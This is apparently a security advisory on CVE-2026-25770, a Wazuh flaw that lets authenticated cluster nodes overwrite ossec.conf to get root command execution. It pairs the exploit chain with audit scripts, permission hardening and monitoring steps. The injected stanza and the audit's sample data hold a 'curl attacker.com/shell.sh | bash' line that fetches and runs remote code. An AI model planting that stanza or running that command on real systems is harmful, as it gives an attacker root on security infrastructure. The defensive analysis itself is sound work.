CVE-2026-25770: Wazuh Root RCE via Cluster Protocol File Write
A critical privilege escalation vulnerability has been disclosed in Wazuh, the open-source SIEM and XDR platform, tracked as CVE-2026-25770 (CVSS 9.1, Critical). The flaw affects Wazuh versions 3.9.0 through 4.14.2 and allows an authenticated cluster node to escalate to root code execution on the Wazuh manager by overwriting the manager configuration file via the cluster synchronization protocol.
Unlike the companion CVE-2026-25769 (insecure deserialization RCE), this vulnerability exploits a design flaw in the cluster file synchronization mechanism combined with insecure default file permissions — enabling an indirect but reliable root code execution path. The fix is available in Wazuh 4.14.3, released March 17, 2026.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-25770 |
| CVSS Score | 9.1 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
| CWE Classification | CWE-22 (Path Traversal), CWE-269 (Improper Privilege Management), CWE-732 (Incorrect Permission Assignment) |
| GHSA ID | GHSA-r4f7-v3p6-79jm |
| Affected Software | Wazuh 3.9.0 – 4.14.2 |
| Fixed Version | Wazuh 4.14.3 |
| Attack Vector | Network |
| Authentication Required | High (cluster credentials) |
| Scope | Changed — wazuh-user escalates to root via trusted service |
| In-the-Wild Exploitation | Not confirmed at time of disclosure |
| Patch Available | Yes — March 17, 2026 |
Technical Analysis
Root Cause: Insecure File Permissions + Cluster File Sync
The wazuh-clusterd service provides a cluster synchronization protocol that allows authenticated cluster nodes to distribute files across the Wazuh cluster. The vulnerability arises from two compounding issues:
- Unrestricted file write via the cluster protocol: authenticated cluster nodes can write arbitrary files to the manager filesystem with the wazuh system user's permissions, without sufficient path restrictions
- Insecure default permissions on ossec.conf: the main Wazuh manager configuration file at /var/ossec/etc/ossec.conf is writable by the wazuh system user by default
Exploit Chain
1. Attacker gains access to cluster credentials (via compromise of a worker node, credential theft, or insider access)
2. Uses the cluster file synchronization protocol to overwrite /var/ossec/etc/ossec.conf with a modified configuration
3. The malicious ossec.conf includes an injected <localfile> command stanza:

   ```xml
   <localfile>
     <log_format>command</log_format>
     <command>curl attacker.com/shell.sh | bash</command>
     <frequency>60</frequency>
   </localfile>
   ```

4. wazuh-logcollector (running as root) parses the updated configuration on its next config reload cycle
5. logcollector executes the injected command with root privileges
6. Attacker achieves full root code execution on the Wazuh manager

Why logcollector Runs as Root
wazuh-logcollector requires root privileges to read system log files (e.g., /var/log/auth.log, kernel logs, SELinux audit logs) and to bind to privileged monitoring interfaces. This design is a common pattern in SIEM agents — but it means that any configuration injection into the logcollector config file directly results in root-level command execution.
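Because the escalation hinges on a <localfile> stanza whose log_format makes logcollector execute a command, the most direct review a defender can make is to enumerate exactly those stanzas in a manager's ossec.conf. The following Python audit is an added example, not Wazuh project code: it parses an ossec.conf, lists every command-type <localfile> stanza and flags any command not on an operator-maintained allowlist. COMMAND_FORMATS covers both `command` and `full_command`, the two Wazuh log formats under which logcollector runs a command; the embedded sample configuration and the EXPECTED_COMMANDS allowlist are constructed assumptions. Wazuh reads ossec.conf with its own lenient parser, so a file that strict XML parsing rejects should be reviewed by hand rather than assumed clean.

```python
"""Audit a Wazuh ossec.conf for <localfile> stanzas that make logcollector run commands.

Added example, not Wazuh project code. Assumes only the stanza layout shown in
the advisory; the sample configuration and the allowlist are constructed.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Wazuh log_format values under which logcollector executes the <command> child
COMMAND_FORMATS = {"command", "full_command"}


@dataclass
class CommandStanza:
    log_format: str
    command: str
    frequency: Optional[str] = None


def parse_ossec_conf(text: str) -> ET.Element:
    """ossec.conf may contain several top-level <ossec_config> blocks, which is
    not a single well-formed XML document, so wrap it in a synthetic root."""
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)  # drop a declaration if present
    return ET.fromstring("<audit_root>" + text + "</audit_root>")


def find_command_stanzas(text: str) -> List[CommandStanza]:
    """Every <localfile> whose log_format makes logcollector execute a command."""
    found = []
    for lf in parse_ossec_conf(text).iter("localfile"):
        fmt = (lf.findtext("log_format") or "").strip()
        if fmt in COMMAND_FORMATS:
            found.append(CommandStanza(
                log_format=fmt,
                command=(lf.findtext("command") or "").strip(),
                frequency=(lf.findtext("frequency") or "").strip() or None,
            ))
    return found


def unexpected_commands(text: str, allowlist: Iterable[str]) -> List[CommandStanza]:
    """Command stanzas whose command is not in the operator's allowlist."""
    allowed = set(allowlist)
    return [s for s in find_command_stanzas(text) if s.command not in allowed]


# Constructed sample: one benign command stanza (df -P), one syslog stanza,
# and the injected stanza from the advisory's exploit chain.
SAMPLE_OSSEC_CONF = """<!-- constructed sample, not a real manager's file -->
<ossec_config>
  <localfile>
    <log_format>command</log_format>
    <command>df -P</command>
    <frequency>360</frequency>
  </localfile>
  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/auth.log</location>
  </localfile>
</ossec_config>
<ossec_config>
  <localfile>
    <log_format>command</log_format>
    <command>curl attacker.com/shell.sh | bash</command>
    <frequency>60</frequency>
  </localfile>
</ossec_config>
"""

# Assumed allowlist: the commands the operator expects logcollector to run.
EXPECTED_COMMANDS = {"df -P"}


def audit_file(path: str, allowlist: Iterable[str] = EXPECTED_COMMANDS) -> List[CommandStanza]:
    """Run the audit against a real file, e.g. /var/ossec/etc/ossec.conf."""
    with open(path, encoding="utf-8") as fh:
        return unexpected_commands(fh.read(), allowlist)


if __name__ == "__main__":
    for s in unexpected_commands(SAMPLE_OSSEC_CONF, EXPECTED_COMMANDS):
        print(f"UNEXPECTED {s.log_format} stanza every {s.frequency}s: {s.command}")
```

Run against the sample, the audit reports the injected stanza and stays silent on the default df -P check. In practice the allowlist is the set of command stanzas present in the version-controlled configuration, so any stanza the cluster sync introduces outside change management shows up as a finding.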
Relationship to CVE-2026-25769
Both CVE-2026-25769 and CVE-2026-25770 were disclosed simultaneously and patched in Wazuh 4.14.3. They share a common attack prerequisite (access to cluster credentials or a worker node) but exploit distinct mechanisms:
| Attribute | CVE-2026-25769 | CVE-2026-25770 |
|---|---|---|
| Mechanism | JSON deserialization RCE | Config file overwrite → root command exec |
| Affected Versions | 4.0.0 – 4.14.2 | 3.9.0 – 4.14.2 |
| CWE | CWE-502 (Deserialization) | CWE-22, CWE-269, CWE-732 |
| Speed to Root | Direct (immediate RCE on master) | Indirect (waits for logcollector reload) |
| Detection Complexity | Moderate | Lower — config file changes are logged |
Both vulnerabilities should be treated with equal urgency and remediated simultaneously by upgrading to 4.14.3.
Impact Assessment
| Impact Area | Description |
|---|---|
| Confidentiality | Root access exposes all Wazuh data, agent credentials, and API keys |
| Integrity | Configuration manipulation can disable alerting, alter detection thresholds, or suppress security events |
| Availability | Root access enables persistent backdoor installation or full service destruction |
| Blast Radius | Wazuh master typically has agent management access across all monitored endpoints |
| SIEM Integrity | Compromise of the security monitoring platform removes detection capability across the entire monitored environment |
Remediation
Primary Fix: Upgrade to Wazuh 4.14.3
```bash
# Update all Wazuh manager nodes
apt-get update && apt-get install wazuh-manager=4.14.3-*
# Restart the manager
systemctl restart wazuh-manager
# Verify the fix
/var/ossec/bin/wazuh-control info | grep -i version
```

Harden File Permissions (Defense-in-Depth)
Even after patching, review and restrict permissions on critical Wazuh config files:
```bash
# Restrict ossec.conf to root-only write (the wazuh group keeps read access)
chown root:wazuh /var/ossec/etc/ossec.conf
chmod 640 /var/ossec/etc/ossec.conf
# Audit files under /var/ossec that the wazuh user or group (or anyone) could write.
# find's -writable tests the *current* user, so run as root it would match every
# file; test the mode bits explicitly instead.
find /var/ossec -type f \
  \( \( -user wazuh -perm /u=w \) -o \( -group wazuh -perm /g=w \) -o -perm /o=w \) \
  | grep -v "queue\|logs\|tmp"
```

Monitor for Configuration Changes
```bash
# Watch the etc directory rather than the file itself: a sync that writes a
# temporary file and renames it over ossec.conf never fires a modify event on a
# watch attached to the old inode, and the filename field read below is only
# reported for directory watches.
inotifywait -m -e modify,close_write,moved_to,create /var/ossec/etc/ |
while read path action file; do
  if [ "$file" = "ossec.conf" ]; then
    echo "ossec.conf modified ($action) — audit immediately" | logger -p security.alert
  fi
done
# Review cluster sync activity
grep "cluster\|sync\|file" /var/ossec/logs/cluster.log | tail -200
```

Any unexpected modifications to /var/ossec/etc/ossec.conf outside of normal change management windows should be treated as a potential compromise indicator.
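The two hardening steps above, checking what the wazuh account can overwrite and noticing when ossec.conf changes, can be scripted so they run from cron or from the SIEM's own command stanzas. The following Python is an added example, not Wazuh project code: can_write applies the ordinary POSIX mode-bit decision (owner bits if the user owns the file, else group bits if one of the user's groups owns it, else other bits), audit_tree walks /var/ossec for regular files the wazuh account could write while skipping the queue, logs and tmp working directories, and config_changed is a poll-based alternative to the inotify watch that compares the current file content against a digest recorded at the last approved change. It assumes a service account named wazuh and the /var/ossec layout from the advisory; ACLs set with setfacl are not evaluated, only mode bits, so a file that passes here could still be writable through an ACL.

```python
"""Audit which Wazuh files the wazuh service account could overwrite, and detect
changes to ossec.conf against a recorded baseline digest.

Added example, not Wazuh project code. Assumes a service account named wazuh and
the /var/ossec layout named in the advisory; only mode bits are evaluated (no ACLs).
"""
import grp
import hashlib
import os
import pwd
import stat
from typing import List, Set, Tuple

OSSEC_CONF = "/var/ossec/etc/ossec.conf"
# Subtrees the wazuh user legitimately writes to; anything writable elsewhere is suspect.
SKIP_PARTS = ("queue", "logs", "tmp")


def can_write(mode: int, file_uid: int, file_gid: int, uid: int, gids: Set[int]) -> bool:
    """POSIX write decision for a user with id `uid` and supplementary groups `gids`.
    Only one class of permission bits applies: owner, else group, else other."""
    if uid == 0:
        return True  # root bypasses mode bits entirely
    if file_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def account_ids(user: str) -> Tuple[int, Set[int]]:
    """uid plus primary and supplementary gids of a local account."""
    pw = pwd.getpwnam(user)
    gids = {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if user in g.gr_mem}
    return pw.pw_uid, gids


def writable_by(path: str, user: str = "wazuh") -> bool:
    """True if `user` could overwrite `path` according to its mode bits."""
    st = os.stat(path)
    uid, gids = account_ids(user)
    return can_write(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid, uid, gids)


def audit_tree(root: str = "/var/ossec", user: str = "wazuh") -> List[str]:
    """Regular files under `root` that `user` could overwrite, excluding SKIP_PARTS."""
    uid, gids = account_ids(user)
    hits = []
    for dirpath, _, files in os.walk(root):
        if any(part in SKIP_PARTS for part in dirpath.split(os.sep)):
            continue
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: do not follow symlinks out of the tree
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and can_write(
                stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid, uid, gids
            ):
                hits.append(full)
    return hits


def fingerprint(data: bytes) -> str:
    """SHA-256 of the configuration content, recorded after each approved change."""
    return hashlib.sha256(data).hexdigest()


def config_changed(current: bytes, baseline_digest: str) -> bool:
    """Poll-style alternative to the inotify watch: compare content to the baseline."""
    return fingerprint(current) != baseline_digest


if __name__ == "__main__":
    print("ossec.conf writable by wazuh:", writable_by(OSSEC_CONF))
    for p in audit_tree():
        print("writable by wazuh:", p)
    with open(OSSEC_CONF, "rb") as fh:
        # In a real deployment the baseline digest is stored outside /var/ossec,
        # where the wazuh account cannot rewrite it alongside the file.
        print("current ossec.conf digest:", fingerprint(fh.read()))
```

Keep the baseline digest somewhere the wazuh account cannot write, since a sync that can replace ossec.conf could otherwise replace the recorded digest as well; on a patched 4.14.3 manager this check is what turns "file permission hardening" into an alert when the hardened mode drifts back.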
Key Takeaways
- CVE-2026-25770 allows authenticated cluster nodes to overwrite ossec.conf, triggering root command execution via the wazuh-logcollector service
- CVSS 9.1 (Critical) — closely mirrors the impact scope of companion CVE-2026-25769, which was disclosed and patched simultaneously
- Broader version range (3.9.0–4.14.2) vs CVE-2026-25769 (4.0.0–4.14.2) — organizations on older Wazuh versions are equally at risk
- No confirmed in-the-wild exploitation at disclosure, but given simultaneous Mirai activity targeting CVE-2026-25769, exploitation of CVE-2026-25770 should be anticipated
- Upgrade to Wazuh 4.14.3 resolves both CVEs — prioritize if you are running any Wazuh cluster deployment
- File permission hardening provides meaningful defense-in-depth even on patched systems